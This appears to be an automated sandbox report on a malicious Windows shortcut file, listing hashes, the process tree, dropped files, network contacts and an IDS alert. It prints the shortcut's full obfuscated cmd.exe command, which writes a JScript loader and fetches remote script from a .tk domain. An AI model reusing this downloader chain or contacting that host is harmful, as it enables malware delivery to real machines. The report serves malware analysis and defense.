File name: | aacae30c289ddbd0b94eb283cf4b95f3229bab335702ab1b7f5e73dcbd69b776 |
Full analysis: | https://app.any.run/tasks/80e76c2c-e470-4669-9715-f4d015831416 |
Verdict: | Malicious activity |
Analysis date: | March 30, 2020, 19:16:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=9, Archive, ctime=Sat Jul 16 12:18:09 2016, mtime=Sat Jul 16 12:18:09 2016, atime=Sat Jul 16 12:18:09 2016, length=202752, window=hidenormalshowminimized |
MD5: | B9473C7DFF23D94940C78723A0795315 |
SHA1: | 851250E0DF025DA42C7201CE8BFFE5904D17E12A |
SHA256: | AACAE30C289DDBD0B94EB283CF4B95F3229BAB335702AB1B7F5E73DCBD69B776 |
SSDEEP: | 48:8u61VJ6VTN2ZjBPUR2sHfu5f6eYDynol5xTG5:8X1XOEj/6eYDynf |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
---|---|
FileAttributes: | Archive |
CreateDate: | 2016:07:16 15:18:09+02:00 |
AccessDate: | 2016:07:16 15:18:09+02:00 |
ModifyDate: | 2016:07:16 15:18:09+02:00 |
TargetFileSize: | 202752 |
IconIndex: | 9 |
RunWindow: | Show Minimized No Activate |
HotKey: | (none) |
TargetFileDOSName: | cmd.exe |
DriveType: | Fixed Disk |
VolumeLabel: | Windows |
LocalBasePath: | C:\Windows\System32\cmd.exe |
Description: | 996396872772317611871 |
RelativePath: | ..\..\..\..\..\..\Windows\System32\cmd.exe |
CommandLineArguments: | /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5" |
IconFileName: | %SystemRoot%\system32\shell32.dll |
MachineID: | ns571773 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3364 | "C:\Windows\System32\cmd.exe" /c "sET ULK=ExpNYERTLoNYERTRENYERTr /NYERTc,NYERT&&sET SHN=GeIQVCXItOIQVCXIbjIQVCXIecIQVCXIt(IQVCXI'sIQVCXIcrIQVCXIipIQVCXIt:HIQVCXITtIQVCXIpS:IQVCXI&&sET cv2udHx=1NAWY1NAWYa6hbtfba8s.capanha01v4h6m7.tk1NAWY?011NAWY')&&sEt/^p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%"<nul > C:\Users\Public\2iehhnh.js|md ^\ ^||>nul >nul exPlOreR /c, C:\Users\Public\2iehhnh.js|>nul >nul >nul >nul >nul exit|>nul >nul echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1084 | C:\Windows\system32\cmd.exe /S /D /c" sEt/p ltaHcu6="%SHN:IQVCXI=%%cv2udHx:1NAWY=/%" 0<nul 1>C:\Users\Public\2iehhnh.js" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3872 | C:\Windows\system32\cmd.exe /S /D /c" md \ |" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1024 | exPlOreR /c, C:\Users\Public\2iehhnh.js | C:\Windows\explorer.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3576 | C:\Windows\system32\cmd.exe /S /D /c" exit 1>nul" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2688 | C:\Windows\system32\cmd.exe /S /D /c" echo DYRXS6IR3DSZE74IKXJ7QFQMH6E9NMH6I6IBH6UDIMJ8U0YBI6L0YBM429LIMFIILIVDG8KCBJL2ICBS7TAJIS6EDICF6LHIMIIL0YBJ53HLCV2IILCBDH8HNBJL9WCBS6KWJIJ6KDFX46LHSXEIKHSXJ5 1>nul" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2724 | C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | C:\Windows\explorer.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1232 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\2iehhnh.js" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1232 | WScript.exe | C:\Users\admin\AppData\Local\Temp\CabD421.tmp | — | |
MD5:— | SHA256:— | |||
1232 | WScript.exe | C:\Users\admin\AppData\Local\Temp\TarD422.tmp | — | |
MD5:— | SHA256:— | |||
1232 | WScript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1 | binary | |
MD5:F350048EC59AF23FF6480A61193CAA4D | SHA256:4ABEE9E318CA036FF4082416825973B7D71E6285B8915CCEB5F6D794417D7DBE | |||
1232 | WScript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_74167E25E5476CCA2A5946AAA61BF9E1 | der | |
MD5:907131A56BA168672FD6DCA3988E2A2B | SHA256:7A4D281C2E93B883F2A05E43F75A91BCA5F83FB3F1FE3AC84FDA45D6146BAB05 | |||
1084 | cmd.exe | C:\Users\Public\2iehhnh.js | text | |
MD5:26EC1B624C95FFA53EDD2658DB234DB6 | SHA256:834A0E8586C365FB08DFB537FC2EF0CBDF036CA108313E164CDDA6F9A24F83CB |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1232 | WScript.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1232 | WScript.exe | 104.31.90.111:443 | a6hbtfba8s.capanha01v4h6m7.tk | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
a6hbtfba8s.capanha01v4h6m7.tk |
| unknown |
ocsp.digicert.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile |